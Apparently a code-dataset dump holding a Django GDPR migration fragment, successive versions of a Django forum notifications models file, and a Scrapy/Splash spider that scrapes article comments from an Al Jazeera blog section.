check_uniqueness_and_keep_latest_active_legal_reason_related_object(apps, schema_editor):\n LegalReasonRelatedObject = apps.get_model(u'gdpr', u'LegalReasonRelatedObject')\n check_qs = LegalReasonRelatedObject.objects.values(u'legal_reason', u'object_content_type', u'object_id').annotate(\n lrro_count=Count(u'legal_reason')).filter(lrro_count__gt=1).order_by(u'-lrro_count').distinct()\n\n for legal_reason_related_object in tqdm(check_qs.all(), ncols=100):\n remove_duplicate_legal_reasons_relatives(apps, legal_reason_related_object[u'legal_reason'],\n legal_reason_related_object[u'object_content_type'],\n legal_reason_related_object[u'object_id']\n )\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n (u'gdpr', u'0002_auto_20180509_1518'),\n (u'contenttypes', u'0002_remove_content_type_name'),\n ]\n operations = [\n migrations.AlterField(\n model_name=u'legalreason',\n name=u'purpose_slug',\n field=models.CharField(choices=[], db_index=True,\n max_length=100, verbose_name=u'purpose'),\n ),\n migrations.AlterField(\n model_name=u'legalreason',\n name=u'source_object_id',\n field=models.TextField(verbose_name=u'source object ID', db_index=True),\n ),\n migrations.AlterField(\n model_name=u'legalreasonrelatedobject',\n name=u'object_id',\n field=models.TextField(verbose_name=u'related object ID', db_index=True),\n ),\n migrations.RunPython(check_uniqueness_and_keep_latest_active_legal_reason),\n migrations.RunPython(check_uniqueness_and_keep_latest_active_legal_reason_related_object),\n ]\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
class UserNotification(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
notification_content = models.CharField(max_length=100)
notification_link = models.CharField(max_length=100)
created_at = models.DateTimeField(auto_now_add=True)
class Post(AbstractPost):
__original_flags = None
__original_votes = None
def __init__(self, *args, **kwargs):
super(Post, self).__init__(*args, **kwargs)
self.__original_flags = self.flag_count
self.__original_votes = self.vote_count
def save(self, force_insert=False, force_update=False, *args, **kwargs):
super(Post, self).save(force_insert, force_update, *args, **kwargs)
notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(self
.topic.forum.slug, self.topic.forum.id, self.topic.slug, self.
topic.id, self.id, self.id)
if self.__original_flags != self.flag_count:
n = UserNotification(user=self.poster, notification_content=
'Flag updates on post {}'.format(self.subject),
notification_link=notification_link)
n.save()
if self.__original_votes != self.vote_count:
n = UserNotification(user=self.poster, notification_content=
'Vote update on post {}'.format(self.subject),
notification_link=notification_link)
n.save()
self.__original_flags = self.flag_count
self.__original_votes = self.vote_count
class Userflags(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
flag_count = models.PositiveIntegerField(verbose_name=_('Flag count'),
editable=False, blank=True, default=0)
<|reserved_special_token_0|>
@receiver(post_save, sender=User)
def save_userflags(sender, instance, **kwargs):
instance.userflags.save()
@receiver(post_save, sender=Post)
def make_notifications(sender, instance, created, **kwargs):
user = instance.topic.poster
notification_content = 'You have a new notification'
notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(instance
.topic.forum.slug, instance.topic.forum.id, instance.topic.slug,
instance.topic.id, instance.id, instance.id)
if created:
notification_content = ('A new post was created on your topic {}'.
format(instance.topic.slug))
else:
notification_content = ("A post's contetn was edited on your topic {}"
.format(instance.topic.slug))
n = UserNotification(user=user, notification_link=notification_link,
notification_content=notification_content)
n.save()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class UserNotification(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
notification_content = models.CharField(max_length=100)
notification_link = models.CharField(max_length=100)
created_at = models.DateTimeField(auto_now_add=True)
class Post(AbstractPost):
__original_flags = None
__original_votes = None
def __init__(self, *args, **kwargs):
super(Post, self).__init__(*args, **kwargs)
self.__original_flags = self.flag_count
self.__original_votes = self.vote_count
def save(self, force_insert=False, force_update=False, *args, **kwargs):
super(Post, self).save(force_insert, force_update, *args, **kwargs)
notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(self
.topic.forum.slug, self.topic.forum.id, self.topic.slug, self.
topic.id, self.id, self.id)
if self.__original_flags != self.flag_count:
n = UserNotification(user=self.poster, notification_content=
'Flag updates on post {}'.format(self.subject),
notification_link=notification_link)
n.save()
if self.__original_votes != self.vote_count:
n = UserNotification(user=self.poster, notification_content=
'Vote update on post {}'.format(self.subject),
notification_link=notification_link)
n.save()
self.__original_flags = self.flag_count
self.__original_votes = self.vote_count
class Userflags(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
flag_count = models.PositiveIntegerField(verbose_name=_('Flag count'),
editable=False, blank=True, default=0)
@receiver(post_save, sender=User)
def create_userflags(sender, instance, created, **kwargs):
if created:
Userflags.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_userflags(sender, instance, **kwargs):
instance.userflags.save()
@receiver(post_save, sender=Post)
def make_notifications(sender, instance, created, **kwargs):
user = instance.topic.poster
notification_content = 'You have a new notification'
notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(instance
.topic.forum.slug, instance.topic.forum.id, instance.topic.slug,
instance.topic.id, instance.id, instance.id)
if created:
notification_content = ('A new post was created on your topic {}'.
format(instance.topic.slug))
else:
notification_content = ("A post's contetn was edited on your topic {}"
.format(instance.topic.slug))
n = UserNotification(user=user, notification_link=notification_link,
notification_content=notification_content)
n.save()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
Topic = model_factory(AbstractTopic)
class UserNotification(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
notification_content = models.CharField(max_length=100)
notification_link = models.CharField(max_length=100)
created_at = models.DateTimeField(auto_now_add=True)
class Post(AbstractPost):
__original_flags = None
__original_votes = None
def __init__(self, *args, **kwargs):
super(Post, self).__init__(*args, **kwargs)
self.__original_flags = self.flag_count
self.__original_votes = self.vote_count
def save(self, force_insert=False, force_update=False, *args, **kwargs):
super(Post, self).save(force_insert, force_update, *args, **kwargs)
notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(self
.topic.forum.slug, self.topic.forum.id, self.topic.slug, self.
topic.id, self.id, self.id)
if self.__original_flags != self.flag_count:
n = UserNotification(user=self.poster, notification_content=
'Flag updates on post {}'.format(self.subject),
notification_link=notification_link)
n.save()
if self.__original_votes != self.vote_count:
n = UserNotification(user=self.poster, notification_content=
'Vote update on post {}'.format(self.subject),
notification_link=notification_link)
n.save()
self.__original_flags = self.flag_count
self.__original_votes = self.vote_count
class Userflags(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
flag_count = models.PositiveIntegerField(verbose_name=_('Flag count'),
editable=False, blank=True, default=0)
@receiver(post_save, sender=User)
def create_userflags(sender, instance, created, **kwargs):
if created:
Userflags.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_userflags(sender, instance, **kwargs):
instance.userflags.save()
@receiver(post_save, sender=Post)
def make_notifications(sender, instance, created, **kwargs):
user = instance.topic.poster
notification_content = 'You have a new notification'
notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(instance
.topic.forum.slug, instance.topic.forum.id, instance.topic.slug,
instance.topic.id, instance.id, instance.id)
if created:
notification_content = ('A new post was created on your topic {}'.
format(instance.topic.slug))
else:
notification_content = ("A post's contetn was edited on your topic {}"
.format(instance.topic.slug))
n = UserNotification(user=user, notification_link=notification_link,
notification_content=notification_content)
n.save()
<|reserved_special_token_1|>
from __future__ import unicode_literals
from machina.apps.forum_conversation.abstract_models import AbstractPost
from machina.apps.forum_conversation.abstract_models import AbstractTopic
from machina.core.db.models import model_factory
from django.dispatch import receiver
from django.db.models.signals import post_save
from django.contrib.auth.models import User
from django.db import models
from django.utils.translation import ugettext_lazy as _
Topic = model_factory(AbstractTopic)
class UserNotification(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
notification_content = models.CharField(max_length=100)
notification_link = models.CharField(max_length=100)
created_at = models.DateTimeField(auto_now_add=True)
class Post(AbstractPost):
__original_flags = None
__original_votes = None
def __init__(self, *args, **kwargs):
super(Post, self).__init__(*args, **kwargs)
self.__original_flags = self.flag_count
self.__original_votes = self.vote_count
def save(self, force_insert=False, force_update=False, *args, **kwargs):
super(Post, self).save(force_insert, force_update, *args, **kwargs)
notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(self
.topic.forum.slug, self.topic.forum.id, self.topic.slug, self.
topic.id, self.id, self.id)
if self.__original_flags != self.flag_count:
n = UserNotification(user=self.poster, notification_content=
'Flag updates on post {}'.format(self.subject),
notification_link=notification_link)
n.save()
if self.__original_votes != self.vote_count:
n = UserNotification(user=self.poster, notification_content=
'Vote update on post {}'.format(self.subject),
notification_link=notification_link)
n.save()
self.__original_flags = self.flag_count
self.__original_votes = self.vote_count
class Userflags(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
flag_count = models.PositiveIntegerField(verbose_name=_('Flag count'),
editable=False, blank=True, default=0)
@receiver(post_save, sender=User)
def create_userflags(sender, instance, created, **kwargs):
if created:
Userflags.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_userflags(sender, instance, **kwargs):
instance.userflags.save()
@receiver(post_save, sender=Post)
def make_notifications(sender, instance, created, **kwargs):
user = instance.topic.poster
notification_content = 'You have a new notification'
notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(instance
.topic.forum.slug, instance.topic.forum.id, instance.topic.slug,
instance.topic.id, instance.id, instance.id)
if created:
notification_content = ('A new post was created on your topic {}'.
format(instance.topic.slug))
else:
notification_content = ("A post's contetn was edited on your topic {}"
.format(instance.topic.slug))
n = UserNotification(user=user, notification_link=notification_link,
notification_content=notification_content)
n.save()
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from machina.apps.forum_conversation.abstract_models import AbstractPost
from machina.apps.forum_conversation.abstract_models import AbstractTopic
from machina.core.db.models import model_factory
from django.dispatch import receiver
from django.db.models.signals import post_save
from django.contrib.auth.models import User
from django.db import models
from django.utils.translation import ugettext_lazy as _
# Concrete Topic model built from django-machina's abstract base class.
Topic = model_factory(AbstractTopic)
class UserNotification(models.Model):
    """A per-user notification with a link back to the relevant forum post."""

    # Recipient; notifications are deleted together with the user.
    user = models.ForeignKey(User, on_delete=models.CASCADE)
    # Human-readable message shown to the user.
    notification_content = models.CharField(max_length=100)
    # Relative URL pointing at the post that triggered the notification.
    notification_link = models.CharField(max_length=100)
    # Set once when the row is inserted.
    created_at = models.DateTimeField(auto_now_add=True)
class Post(AbstractPost):
    """Forum post that notifies its author when its flag or vote count changes.

    Counter values are snapshotted at instantiation time; ``save`` compares
    the current counters against the snapshots and creates a
    ``UserNotification`` for each counter that changed.
    """

    # Snapshots of the counters taken in __init__, used by save() to detect changes.
    __original_flags = None
    __original_votes = None

    def __init__(self, *args, **kwargs):
        super(Post, self).__init__(*args, **kwargs)
        self.__original_flags = self.flag_count
        self.__original_votes = self.vote_count

    def save(self, force_insert=False, force_update=False, *args, **kwargs):
        """Persist the post, then notify the poster about counter changes."""
        super(Post, self).save(force_insert, force_update, *args, **kwargs)
        notification_link = "/forum/{}-{}/topic/{}-{}/?post={}#{}".format(
            self.topic.forum.slug, self.topic.forum.id, self.topic.slug,
            self.topic.id, self.id, self.id)
        if self.__original_flags != self.flag_count:
            self._notify("Flag updates on post {}".format(self.subject), notification_link)
        if self.__original_votes != self.vote_count:
            self._notify("Vote update on post {}".format(self.subject), notification_link)
        # Re-sync the snapshots so a repeated save only notifies on new changes.
        self.__original_flags = self.flag_count
        self.__original_votes = self.vote_count

    def _notify(self, content, link):
        """Create and store a notification for this post's author."""
        UserNotification(user=self.poster, notification_content=content,
                         notification_link=link).save()
class Userflags(models.Model):
    """One-to-one companion record holding a per-user flag counter."""

    # Exactly one Userflags row per User; removed together with the user.
    user = models.OneToOneField(User, on_delete=models.CASCADE)
    # Maintained by application code elsewhere; not editable via forms/admin.
    flag_count = models.PositiveIntegerField(
        verbose_name=_('Flag count'), editable=False, blank=True, default=0)
@receiver(post_save, sender=User)
def create_userflags(sender, instance, created, **kwargs):
    """Attach a fresh Userflags record to every newly created User."""
    if not created:
        return
    Userflags.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_userflags(sender, instance, **kwargs):
    # Persist the related Userflags row whenever the User itself is saved.
    # NOTE(review): assumes instance.userflags already exists (created by
    # create_userflags on insert) -- a User saved without one would raise.
    instance.userflags.save()
@receiver(post_save, sender=Post)
def make_notifications(sender, instance, created, **kwargs):
    """Notify a topic's owner whenever a post in that topic is created or edited.

    Fires on every Post save; the message depends on whether the row was just
    inserted (``created``) or updated.
    """
    user = instance.topic.poster
    notification_link = "/forum/{}-{}/topic/{}-{}/?post={}#{}".format(
        instance.topic.forum.slug, instance.topic.forum.id, instance.topic.slug,
        instance.topic.id, instance.id, instance.id)
    if created:
        notification_content = "A new post was created on your topic {}".format(instance.topic.slug)
    else:
        # Typo fixed in the user-facing message ("contetn" -> "content").
        notification_content = "A post's content was edited on your topic {}".format(instance.topic.slug)
    n = UserNotification(user=user, notification_link=notification_link,
                         notification_content=notification_content)
    n.save()
|
flexible
|
{
"blob_id": "1e81e0f3cb2fb25fdef08a913aa1ff77d0c2a562",
"index": 9204,
"step-1": "<mask token>\n\n\nclass UserNotification(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n notification_content = models.CharField(max_length=100)\n notification_link = models.CharField(max_length=100)\n created_at = models.DateTimeField(auto_now_add=True)\n\n\nclass Post(AbstractPost):\n __original_flags = None\n __original_votes = None\n\n def __init__(self, *args, **kwargs):\n super(Post, self).__init__(*args, **kwargs)\n self.__original_flags = self.flag_count\n self.__original_votes = self.vote_count\n\n def save(self, force_insert=False, force_update=False, *args, **kwargs):\n super(Post, self).save(force_insert, force_update, *args, **kwargs)\n notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(self\n .topic.forum.slug, self.topic.forum.id, self.topic.slug, self.\n topic.id, self.id, self.id)\n if self.__original_flags != self.flag_count:\n n = UserNotification(user=self.poster, notification_content=\n 'Flag updates on post {}'.format(self.subject),\n notification_link=notification_link)\n n.save()\n if self.__original_votes != self.vote_count:\n n = UserNotification(user=self.poster, notification_content=\n 'Vote update on post {}'.format(self.subject),\n notification_link=notification_link)\n n.save()\n self.__original_flags = self.flag_count\n self.__original_votes = self.vote_count\n\n\nclass Userflags(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n flag_count = models.PositiveIntegerField(verbose_name=_('Flag count'),\n editable=False, blank=True, default=0)\n\n\n<mask token>\n\n\n@receiver(post_save, sender=User)\ndef save_userflags(sender, instance, **kwargs):\n instance.userflags.save()\n\n\n@receiver(post_save, sender=Post)\ndef make_notifications(sender, instance, created, **kwargs):\n user = instance.topic.poster\n notification_content = 'You have a new notification'\n notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(instance\n .topic.forum.slug, 
instance.topic.forum.id, instance.topic.slug,\n instance.topic.id, instance.id, instance.id)\n if created:\n notification_content = ('A new post was created on your topic {}'.\n format(instance.topic.slug))\n else:\n notification_content = (\"A post's contetn was edited on your topic {}\"\n .format(instance.topic.slug))\n n = UserNotification(user=user, notification_link=notification_link,\n notification_content=notification_content)\n n.save()\n",
"step-2": "<mask token>\n\n\nclass UserNotification(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n notification_content = models.CharField(max_length=100)\n notification_link = models.CharField(max_length=100)\n created_at = models.DateTimeField(auto_now_add=True)\n\n\nclass Post(AbstractPost):\n __original_flags = None\n __original_votes = None\n\n def __init__(self, *args, **kwargs):\n super(Post, self).__init__(*args, **kwargs)\n self.__original_flags = self.flag_count\n self.__original_votes = self.vote_count\n\n def save(self, force_insert=False, force_update=False, *args, **kwargs):\n super(Post, self).save(force_insert, force_update, *args, **kwargs)\n notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(self\n .topic.forum.slug, self.topic.forum.id, self.topic.slug, self.\n topic.id, self.id, self.id)\n if self.__original_flags != self.flag_count:\n n = UserNotification(user=self.poster, notification_content=\n 'Flag updates on post {}'.format(self.subject),\n notification_link=notification_link)\n n.save()\n if self.__original_votes != self.vote_count:\n n = UserNotification(user=self.poster, notification_content=\n 'Vote update on post {}'.format(self.subject),\n notification_link=notification_link)\n n.save()\n self.__original_flags = self.flag_count\n self.__original_votes = self.vote_count\n\n\nclass Userflags(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n flag_count = models.PositiveIntegerField(verbose_name=_('Flag count'),\n editable=False, blank=True, default=0)\n\n\n@receiver(post_save, sender=User)\ndef create_userflags(sender, instance, created, **kwargs):\n if created:\n Userflags.objects.create(user=instance)\n\n\n@receiver(post_save, sender=User)\ndef save_userflags(sender, instance, **kwargs):\n instance.userflags.save()\n\n\n@receiver(post_save, sender=Post)\ndef make_notifications(sender, instance, created, **kwargs):\n user = instance.topic.poster\n 
notification_content = 'You have a new notification'\n notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(instance\n .topic.forum.slug, instance.topic.forum.id, instance.topic.slug,\n instance.topic.id, instance.id, instance.id)\n if created:\n notification_content = ('A new post was created on your topic {}'.\n format(instance.topic.slug))\n else:\n notification_content = (\"A post's contetn was edited on your topic {}\"\n .format(instance.topic.slug))\n n = UserNotification(user=user, notification_link=notification_link,\n notification_content=notification_content)\n n.save()\n",
"step-3": "<mask token>\nTopic = model_factory(AbstractTopic)\n\n\nclass UserNotification(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n notification_content = models.CharField(max_length=100)\n notification_link = models.CharField(max_length=100)\n created_at = models.DateTimeField(auto_now_add=True)\n\n\nclass Post(AbstractPost):\n __original_flags = None\n __original_votes = None\n\n def __init__(self, *args, **kwargs):\n super(Post, self).__init__(*args, **kwargs)\n self.__original_flags = self.flag_count\n self.__original_votes = self.vote_count\n\n def save(self, force_insert=False, force_update=False, *args, **kwargs):\n super(Post, self).save(force_insert, force_update, *args, **kwargs)\n notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(self\n .topic.forum.slug, self.topic.forum.id, self.topic.slug, self.\n topic.id, self.id, self.id)\n if self.__original_flags != self.flag_count:\n n = UserNotification(user=self.poster, notification_content=\n 'Flag updates on post {}'.format(self.subject),\n notification_link=notification_link)\n n.save()\n if self.__original_votes != self.vote_count:\n n = UserNotification(user=self.poster, notification_content=\n 'Vote update on post {}'.format(self.subject),\n notification_link=notification_link)\n n.save()\n self.__original_flags = self.flag_count\n self.__original_votes = self.vote_count\n\n\nclass Userflags(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n flag_count = models.PositiveIntegerField(verbose_name=_('Flag count'),\n editable=False, blank=True, default=0)\n\n\n@receiver(post_save, sender=User)\ndef create_userflags(sender, instance, created, **kwargs):\n if created:\n Userflags.objects.create(user=instance)\n\n\n@receiver(post_save, sender=User)\ndef save_userflags(sender, instance, **kwargs):\n instance.userflags.save()\n\n\n@receiver(post_save, sender=Post)\ndef make_notifications(sender, instance, created, **kwargs):\n user = 
instance.topic.poster\n notification_content = 'You have a new notification'\n notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(instance\n .topic.forum.slug, instance.topic.forum.id, instance.topic.slug,\n instance.topic.id, instance.id, instance.id)\n if created:\n notification_content = ('A new post was created on your topic {}'.\n format(instance.topic.slug))\n else:\n notification_content = (\"A post's contetn was edited on your topic {}\"\n .format(instance.topic.slug))\n n = UserNotification(user=user, notification_link=notification_link,\n notification_content=notification_content)\n n.save()\n",
"step-4": "from __future__ import unicode_literals\nfrom machina.apps.forum_conversation.abstract_models import AbstractPost\nfrom machina.apps.forum_conversation.abstract_models import AbstractTopic\nfrom machina.core.db.models import model_factory\nfrom django.dispatch import receiver\nfrom django.db.models.signals import post_save\nfrom django.contrib.auth.models import User\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nTopic = model_factory(AbstractTopic)\n\n\nclass UserNotification(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n notification_content = models.CharField(max_length=100)\n notification_link = models.CharField(max_length=100)\n created_at = models.DateTimeField(auto_now_add=True)\n\n\nclass Post(AbstractPost):\n __original_flags = None\n __original_votes = None\n\n def __init__(self, *args, **kwargs):\n super(Post, self).__init__(*args, **kwargs)\n self.__original_flags = self.flag_count\n self.__original_votes = self.vote_count\n\n def save(self, force_insert=False, force_update=False, *args, **kwargs):\n super(Post, self).save(force_insert, force_update, *args, **kwargs)\n notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(self\n .topic.forum.slug, self.topic.forum.id, self.topic.slug, self.\n topic.id, self.id, self.id)\n if self.__original_flags != self.flag_count:\n n = UserNotification(user=self.poster, notification_content=\n 'Flag updates on post {}'.format(self.subject),\n notification_link=notification_link)\n n.save()\n if self.__original_votes != self.vote_count:\n n = UserNotification(user=self.poster, notification_content=\n 'Vote update on post {}'.format(self.subject),\n notification_link=notification_link)\n n.save()\n self.__original_flags = self.flag_count\n self.__original_votes = self.vote_count\n\n\nclass Userflags(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n flag_count = 
models.PositiveIntegerField(verbose_name=_('Flag count'),\n editable=False, blank=True, default=0)\n\n\n@receiver(post_save, sender=User)\ndef create_userflags(sender, instance, created, **kwargs):\n if created:\n Userflags.objects.create(user=instance)\n\n\n@receiver(post_save, sender=User)\ndef save_userflags(sender, instance, **kwargs):\n instance.userflags.save()\n\n\n@receiver(post_save, sender=Post)\ndef make_notifications(sender, instance, created, **kwargs):\n user = instance.topic.poster\n notification_content = 'You have a new notification'\n notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(instance\n .topic.forum.slug, instance.topic.forum.id, instance.topic.slug,\n instance.topic.id, instance.id, instance.id)\n if created:\n notification_content = ('A new post was created on your topic {}'.\n format(instance.topic.slug))\n else:\n notification_content = (\"A post's contetn was edited on your topic {}\"\n .format(instance.topic.slug))\n n = UserNotification(user=user, notification_link=notification_link,\n notification_content=notification_content)\n n.save()\n",
"step-5": "# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nfrom machina.apps.forum_conversation.abstract_models import AbstractPost\nfrom machina.apps.forum_conversation.abstract_models import AbstractTopic\nfrom machina.core.db.models import model_factory\nfrom django.dispatch import receiver\nfrom django.db.models.signals import post_save\nfrom django.contrib.auth.models import User\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\n\nTopic = model_factory(AbstractTopic)\n\n\nclass UserNotification(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n notification_content = models.CharField(max_length=100)\n notification_link = models.CharField(max_length=100)\n created_at = models.DateTimeField(auto_now_add=True)\n\n\nclass Post(AbstractPost):\n __original_flags = None\n __original_votes = None\n\n def __init__(self, *args, **kwargs):\n super(Post, self).__init__(*args, **kwargs)\n self.__original_flags = self.flag_count\n self.__original_votes = self.vote_count\n\n def save(self, force_insert=False, force_update=False, *args, **kwargs):\n super(Post, self).save(force_insert, force_update, *args, **kwargs)\n\n notification_link = \"/forum/{}-{}/topic/{}-{}/?post={}#{}\".format(self.topic.forum.slug, self.topic.forum.id, self.topic.slug, self.topic.id, self.id, self.id)\n if self.__original_flags != self.flag_count:\n n = UserNotification(user=self.poster, notification_content=\"Flag updates on post {}\".format(self.subject), notification_link=notification_link)\n n.save()\n\n if self.__original_votes != self.vote_count:\n n = UserNotification(user=self.poster, notification_content=\"Vote update on post {}\".format(self.subject), notification_link=notification_link)\n n.save()\n\n self.__original_flags = self.flag_count\n self.__original_votes = self.vote_count\n\nclass Userflags(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n\n flag_count = 
models.PositiveIntegerField(\n verbose_name=_('Flag count'), editable=False, blank=True, default=0)\n\n@receiver(post_save, sender=User)\ndef create_userflags(sender, instance, created, **kwargs):\n if created:\n Userflags.objects.create(user=instance) \n\n@receiver(post_save, sender=User)\ndef save_userflags(sender, instance, **kwargs):\n instance.userflags.save() \n\n@receiver(post_save, sender=Post)\ndef make_notifications(sender, instance, created, **kwargs):\n user = instance.topic.poster\n notification_content = \"You have a new notification\"\n notification_link = \"/forum/{}-{}/topic/{}-{}/?post={}#{}\".format(instance.topic.forum.slug, instance.topic.forum.id, instance.topic.slug, instance.topic.id, instance.id, instance.id)\n\n if created:\n notification_content = \"A new post was created on your topic {}\".format(instance.topic.slug)\n else:\n notification_content = \"A post's contetn was edited on your topic {}\".format(instance.topic.slug)\n\n n = UserNotification(user=user, notification_link=notification_link, notification_content=notification_content)\n n.save()\n",
"step-ids": [
10,
11,
12,
13,
14
]
}
|
[
10,
11,
12,
13,
14
] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import re
import arabic_reshaper
from scrapy import Spider, Request
from bidi.algorithm import get_display
from websites.items import ArticleItem
from operator import add
from scrapy_splash import SplashRequest
class Blogsaljazeera2Spider(Spider):
    """Scrapy spider for the "short" topics section of blogs.aljazeera.net.

    The site loads more content through a "load more" button, so pages are
    rendered through a Splash browser driven by a generated Lua script that
    clicks the first <button> repeatedly before returning the HTML.
    """

    name = 'blogsaljazeera2'
    allowed_domains = ['blogs.aljazeera.net']
    start_urls = ['http://blogs.aljazeera.net/topics/short']

    @staticmethod
    def cleanhtml(raw_html):
        # Strip all HTML tags (non-greedy <...> match) from a markup string.
        cleanr = re.compile('<.*?>')
        cleantext = re.sub(cleanr, '', raw_html)
        return cleantext

    @staticmethod
    def lua_script(n):
        # Build a Splash Lua script: open the page, click the first <button>
        # n times (waiting 1s after each click so new content can load), then
        # return the rendered HTML. The two {} placeholders are filled with n
        # and the Lua return table respectively.
        LUA_SCRIPT = """
        function main(splash)
            local url = splash.args.url
            assert(splash:go(url))
            assert(splash:wait(1))
            for i=1,{},1 do
                assert(splash:runjs('document.getElementsByTagName("button")[0].click()'))
                assert(splash:wait(1))
            end
            return {}
        end
        """.format(n, "{html=splash:html()}")
        return LUA_SCRIPT

    def parse(self, response):
        # Render each start URL through Splash, clicking "load more" twice.
        for url in self.start_urls:
            yield Request(response.urljoin(url), self.parse_result, meta={
                'splash': {
                    'args': {'lua_source': self.lua_script(2)},
                    'endpoint': 'execute',
                }
            })

    def parse_result(self, response):
        # Follow every article link in the rendered topic listing.
        for link in response.xpath("//*[@id='topics_Artilce_container']/div/a/@href").extract():
            yield Request(response.urljoin(link), self.parse_links, dont_filter=False)

    def parse_links(self, response):
        # The page exposes 6 comments per "load more" click; compute how many
        # clicks reveal them all, then re-render this page through Splash.
        rep = int(int(response.xpath("//input[@id='intTotal']/@value").extract_first())/6)+1
        yield SplashRequest(url=response.urljoin(''), callback=self.parse_comment, endpoint='execute', args={'lua_source': self.lua_script(rep)})

    def parse_comment(self, response):
        """Extract title, author, description, comments and likes into an ArticleItem.

        Each extraction is wrapped in its own try/except so a missing element
        degrades to an empty value rather than aborting the whole item.
        """
        item = ArticleItem()

        title = ""
        try:
            # reshape + get_display store Arabic text in visual (display) order.
            title = get_display(arabic_reshaper.reshape(u'' + self.cleanhtml(response.xpath("//h1[@class='tweet_strip_text']/text()").extract_first()).strip()))
        except (RuntimeError, TypeError, NameError):
            pass
        item["title"] = title

        author = ""
        try:
            # NOTE(review): the "null" XPath looks like an unfinished
            # placeholder — author extraction always fails and is swallowed
            # here, leaving author empty. Confirm the intended selector.
            author = get_display(arabic_reshaper.reshape(u'' + self.cleanhtml(response.xpath("null").extract_first()).strip()))
        except (RuntimeError, TypeError, NameError):
            pass
        item["author"] = author

        item["link"] = response.url

        description = list()
        try:
            # NOTE(review): "null" placeholder again; also cleanhtml() is fed
            # a list here (extract() returns a list), which raises TypeError
            # and is silently swallowed — description always stays empty.
            description.extend([self.cleanhtml(d) for d in get_display(arabic_reshaper.reshape(u'' + self.cleanhtml(response.xpath("null").extract())))])
        except (RuntimeError, TypeError, NameError):
            pass
        item["description"] = description

        comment = list()
        names = list()
        feeds = list()
        try:
            # Comment bodies, commenter names, and like counts, in page order.
            comment.extend([get_display(arabic_reshaper.reshape(u'' + self.cleanhtml(d))) for d in response.xpath("//article/p/text()").extract()])
            names.extend([get_display(arabic_reshaper.reshape(u'' + self.cleanhtml(d))) for d in response.xpath("//article/div/div/h2/text()").extract()])
            feeds.extend([self.cleanhtml(d) for d in response.xpath("//*[@class='number_likes']/text()").extract()])
        except (RuntimeError, TypeError, NameError):
            pass
        item["comments"] = comment
        item["names"] = names
        item["feedbacks"] = feeds

        return item
|
normal
|
{
"blob_id": "17058b323c0a0974dfa8f124ccd6cb5bf29dd849",
"index": 2065,
"step-1": "<mask token>\n\n\nclass Blogsaljazeera2Spider(Spider):\n <mask token>\n <mask token>\n <mask token>\n\n @staticmethod\n def cleanhtml(raw_html):\n cleanr = re.compile('<.*?>')\n cleantext = re.sub(cleanr, '', raw_html)\n return cleantext\n\n @staticmethod\n def lua_script(n):\n LUA_SCRIPT = (\n \"\"\"\n function main(splash)\n local url = splash.args.url\n assert(splash:go(url))\n assert(splash:wait(1))\n for i=1,{},1 do\n assert(splash:runjs('document.getElementsByTagName(\"button\")[0].click()'))\n assert(splash:wait(1))\n end\n return {}\n end\n \"\"\"\n .format(n, '{html=splash:html()}'))\n return LUA_SCRIPT\n\n def parse(self, response):\n for url in self.start_urls:\n yield Request(response.urljoin(url), self.parse_result, meta={\n 'splash': {'args': {'lua_source': self.lua_script(2)},\n 'endpoint': 'execute'}})\n\n def parse_result(self, response):\n for link in response.xpath(\n \"//*[@id='topics_Artilce_container']/div/a/@href\").extract():\n yield Request(response.urljoin(link), self.parse_links,\n dont_filter=False)\n <mask token>\n\n def parse_comment(self, response):\n item = ArticleItem()\n title = ''\n try:\n title = get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(response.xpath(\n 